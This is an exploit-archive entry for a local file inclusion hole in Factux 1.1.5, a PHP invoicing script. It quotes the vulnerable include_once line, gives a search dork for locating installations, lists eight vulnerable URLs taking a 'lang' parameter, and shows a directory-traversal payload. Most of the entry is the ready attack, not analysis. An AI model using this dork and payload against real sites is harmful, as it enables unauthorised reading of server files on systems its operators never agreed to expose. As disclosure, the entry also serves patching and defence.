Factux Local File Include Vulnerability

2010-05-06T00:00:00
ID 1337DAY-ID-12152
Type zdt
Reporter altbta
Modified 2010-05-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =======================================
Factux Local File Include Vulnerability
=======================================

[~] Title : Factux LFI Vulnerability
[~] Author: altbta [l_9[at]hotmail.com]
[~] download : http://www.toocharger.com/telecharger/scripts/factux/3468.htm

[~] dork: "Factux le facturier libre V 1.1.5"
 
### include_once("include/language/$lang.php");
 
[~] Vulnerable File :
 
http://127.0.0.1/Factux/admin_modif.php?lang=
http://127.0.0.1/Factux/admin?lang=
http://127.0.0.1/Factux/article_new.php?lang=
http://127.0.0.1/Factux/article_update.php?lang=
http://127.0.0.1/Factux/backup.php?lang=
http://127.0.0.1/Factux/backup_timeout.php?lang=
http://127.0.0.1/Factux/bon_suite.php?lang=
http://127.0.0.1/Factux/ca_annee.php?lang=
 
 
[~] Example :
 
http://[site]/factux/ca_annee.php?lang=../../index



#  0day.today [2018-01-02]  #